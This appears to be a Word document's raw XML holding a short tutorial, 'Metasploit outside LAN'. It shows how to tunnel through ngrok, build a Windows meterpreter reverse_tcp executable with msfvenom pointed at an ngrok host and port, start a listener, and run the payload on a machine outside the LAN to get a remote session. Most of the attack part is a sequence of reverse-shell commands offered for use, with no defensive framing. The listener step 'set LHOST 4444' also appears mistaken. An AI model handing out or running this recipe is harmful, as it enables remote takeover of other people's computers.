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7D3C" w:rsidRDefault="002A7D3C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Oxygen Mono" w:eastAsia="Oxygen Mono" w:hAnsi="Oxygen Mono" w:cs="Oxygen Mono"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_wxavxic0y9a0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Oxygen Mono" w:eastAsia="Oxygen Mono" w:hAnsi="Oxygen Mono" w:cs="Oxygen Mono"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_sipgvn25rzbx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Oxygen Mono" w:eastAsia="Oxygen Mono" w:hAnsi="Oxygen Mono" w:cs="Oxygen Mono"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="44577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2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Oxygen Mono" w:eastAsia="Oxygen Mono" w:hAnsi="Oxygen Mono" w:cs="Oxygen Mono"/>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit outside LAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3C"/>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Writers: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dovla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, Dime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_q3pi63mtaa8l" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
        <w:t>Goals:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Downloading NGROK and setting up an account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using it in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Starting a listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_1t6jwogig38b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
        <w:t>Setting up NGROK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:t xml:space="preserve">Setting up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is fairly simple.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>their website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>make an account</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and when logged in, download the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executable for Debian. There are instructions on their website and they are well documented, so I won’t go through all of them here. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>running :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a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2A7D3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D3C" w:rsidRDefault="00623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$ .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ngrok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authtoken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[TOKEN]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> protocol. Like this:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0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2A7D3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D3C" w:rsidRDefault="00623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$ .</w:t>
            </w:r>
            <w:proofErr w:type="gram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ngrok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4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238A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Done! You should see a link like this:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a1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2A7D3C">
        <w:trPr>
          <w:trHeight w:val="540"/>
        </w:trPr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D3C" w:rsidRDefault="00623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>tcp://2.tcp.ngrok.io:15096</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238A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Keep that terminal running while you make a payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">previous tutorial) but you MUST use the address and port from the link in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> window, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_nzs6c218fzzs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
        <w:t>Generating the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D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FF9900"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2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2A7D3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D3C" w:rsidRDefault="00623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FF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msfvenom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-p windows/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meterpreter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reverse_tcp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LHOST=2.tcp.ngrok.io LPORT=15096 &gt;&gt; output.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238A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Done! Now you can start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener, but like described under.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_4mxnyjk4p92e" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
        <w:t>Metasploit listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3C"/>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:t xml:space="preserve">While starting the listener everything is usual, just make sure to use the same port as in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>window(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NOT LIKE IN THE PAYLOAD!!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/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2A7D3C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D3C" w:rsidRDefault="006238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FFFFAA"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t>&gt; set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t xml:space="preserve"> LHOST 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238A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Everything else shall stay the same. Run the listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3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A7D3C" w:rsidRDefault="006238A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2A7D3C" w:rsidRDefault="006238AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_atuqx0mhn5nj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF9900"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executing the payload and finishing up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:t xml:space="preserve">This is the end. Now everything is set up. After executing the program on another machine outside of LAN we will still get a session in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> window! Congrats!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="002A7D3C"/>
    <w:p w:rsidR="002A7D3C" w:rsidRDefault="006238AE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3324225</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2157413" cy="2157413"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="2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15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A7D3C" w:rsidRDefault="006238AE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3104793" cy="2252663"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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4793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7D3C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4EF8" w:rsidRDefault="00FE4EF8" w:rsidP="00C60018">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00FE4EF8" w:rsidRDefault="00FE4EF8" w:rsidP="00C600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xygen Mon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4EF8" w:rsidRDefault="00FE4EF8" w:rsidP="00C60018">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00FE4EF8" w:rsidRDefault="00FE4EF8" w:rsidP="00C600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0018" w:rsidRDefault="00C60018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0D26B5E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5524250"/>
        <w:placeholder>
          <w:docPart w:val="B19F761D81A4407A967BD3373DC1DF2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F81BD" w:themeColor="accent1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>&lt;Recollection 1&gt; at &lt;27. VI 2022.&gt;</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w:rsidR="00C60018" w:rsidRDefault="00C600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8F5C6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B028B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D3C"/>
    <w:rsid w:val="002A7D3C"/>
    <w:rsid w:val="006238AE"/>
    <w:rsid w:val="00C60018"/>
    <w:rsid w:val="00FE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E5B42"/>
  <w15:docId w15:val="{82CC31A1-AA38-4501-A9DC-E64BD76F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00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018"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C600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grok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webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dashboard.ngrok.com/signup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19F761D81A4407A967BD3373DC1D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58713-9BB3-4DC2-9866-0494DC753998}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00000000" w:rsidRDefault="00DB0B6F" w:rsidP="00DB0B6F">
          <w:pPr>
            <w:pStyle w:val="B19F761D81A4407A967BD3373DC1DF2A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xygen Mon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6F"/>
    <w:rsid w:val="00644C41"/>
    <w:rsid w:val="00DB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9F761D81A4407A967BD3373DC1DF2A">
    <w:name w:val="B19F761D81A4407A967BD3373DC1DF2A"/>
    <w:rsid w:val="00DB0B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&lt;Recollection 1&gt; at &lt;27. VI 2022.&gt;</dc:title>
  <cp:lastModifiedBy>Dime</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-26T22:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-26T22:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>